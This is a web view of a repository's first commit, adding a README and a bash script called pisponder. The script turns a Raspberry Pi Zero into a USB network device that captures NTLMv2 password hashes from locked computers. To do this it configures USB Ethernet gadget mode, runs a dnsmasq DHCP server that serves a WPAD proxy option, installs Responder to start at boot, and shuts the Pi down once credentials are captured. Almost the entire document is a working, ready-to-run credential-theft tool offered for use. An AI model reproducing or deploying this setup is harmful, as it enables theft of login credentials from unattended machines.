Home Explore Help
Register Sign In
wareck
/
pisponder
1
0
Fork 0
Files Issues 0 Pull Requests 0 Wiki
Browse Source

first commit

Your Name 7 years ago
commit
d55ae9bfbf
2 changed files with 109 additions and 0 deletions
Split View Show Diff Stats
  1. 40 0
      README.md
  2. 69 0
      pisponder.sh

+ 40 - 0
README.md
View File 

@@ -0,0 +1,40 @@
 
+# pisponder
 
+(Pi + Responder)
 
+
 
+Run Responder locally on a Raspberry Pi Zero. Just like a LAN Turtle found here:
 
+https://room362.com/post/2016/snagging-creds-from-locked-machines/
 
+
 
+
 
+
 
+pisponder is my first script. All it does is turn a Raspberry Pi Zero running Raspbian lite into a NTLMv2 hash stealing machine (even when the target computer is locked!).
 
+
 
+**Instructions**
 
+
 
+Download pisponder.sh, make it executable and then run as root.
 
+
 
+Like this for example:
 
+```
 
+wget https://raw.githubusercontent.com/dee-oh-double-gee/pisponder/master/pisponder.sh
 
+
 
+sudo chmod 755 pisponder.sh
 
+
 
+sudo ./pisponder.sh
 
+```
 
+This script will work ONLY on the Raspberry Pi Zero. And I have only tested it on ver 1.3.
 
+
 
+**Demo Video:**
 
+
 
+<a href="http://www.youtube.com/watch?feature=player_embedded&v=0Rrhi5nXQ2k
 
+" target="_blank"><img src="http://img.youtube.com/vi/0Rrhi5nXQ2k/0.jpg" 
+alt="Pisponder Demo" width="240" height="180" border="10" /></a>
 
+
 
+**Credit goes to:**
 
+
 
+https://github.com/lgandx/Responder
 
+
 
+Mubix from room362.com
 
+
 
+https://th3s3cr3tag3nt.blogspot.com/
 
+
 
+http://elevatedprompt.com/2016/09/snagging-credentials-from-locked-machines-with-raspberry-pi-zero/
 
+

+ 69 - 0
pisponder.sh
View File 

@@ -0,0 +1,69 @@
 
+#!/bin/bash
 
+# This is my first script and it is called "PiSponder"
 
+# Please tell me what I can improve upon
 
+# This script will only work on the Raspberry Pi Zero
 
+
 
+if [ $EUID -ne 0 ]; then
 
+	echo "You must use sudo to run this script:"
 
+	echo "sudo $0 $@"
 
+	exit
 
+fi
 
+
 
+apt-get update
 
+
 
+## Setup the PiZero to look like a USB to Ethernet
 
+cd /boot
 
+sed -i -r -e 's/(rootwait)/\1 modules-load=dwc2,g_ether/' cmdline.txt
 
+sed -i -e "\$adtoverlay=dwc2" config.txt
 
+
 
+## Configure static IP for usb0
 
+cat <<'EOF'>>/etc/network/interfaces
 
+
 
+auto usb0
 
+allow-hotplug usb0
 
+iface usb0 inet static
 
+    address 192.168.200.1
 
+    netmask 255.255.255.0
 
+EOF
 
+
 
+
 
+##Install and configure dnsmasq
 
+ apt-get install -y dnsmasq
 
+
 
+
 
+cat <<'EOF'>>/etc/dnsmasq.conf
 
+
 
+interface=usb0
 
+dhcp-range=192.168.200.2,192.168.200.254,255.255.255.0,1h
 
+
 
+dhcp-authoritative
 
+
 
+dhcp-option=252,http://192.168.200.1/wpad.dat
 
+
 
+log-queries
 
+log-dhcp
 
+
 
+port=0
 
+EOF
 
+
 
+##Install Responder and dependencies
 
+apt-get install -y python git python-pip python-dev screen sqlite3 inotify-tools
 
+pip install pycrypto
 
+git clone https://github.com/spiderlabs/responder /opt/responder
 
+
 
+
 
+##Start Responder at bootup
 
+sed -i '/exit/d' /etc/rc.local
 
+
 
+cat <<'EOF'>>/etc/rc.local
 
+# Start Responder
 
+/usr/bin/screen -dmS responder bash -c 'cd /opt/responder/; python Responder.py -I usb0 -f -w -r -d -F'
 
+EOF
 
+
 
+## Stop Responder when its done grabbing NTLM creds and shut down PiZero
 
+## Comment out everything from here down except for exit 0 if you don't want it to shut down the PiZero after it gets the creds
 
+cat <<'EOF'>>/etc/rc.local
 
+# Shutdown once creds have been obtained
 
+/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /opt/responder/Responder.db; do shutdown -h now; done'
 
+exit 0
 
+EOF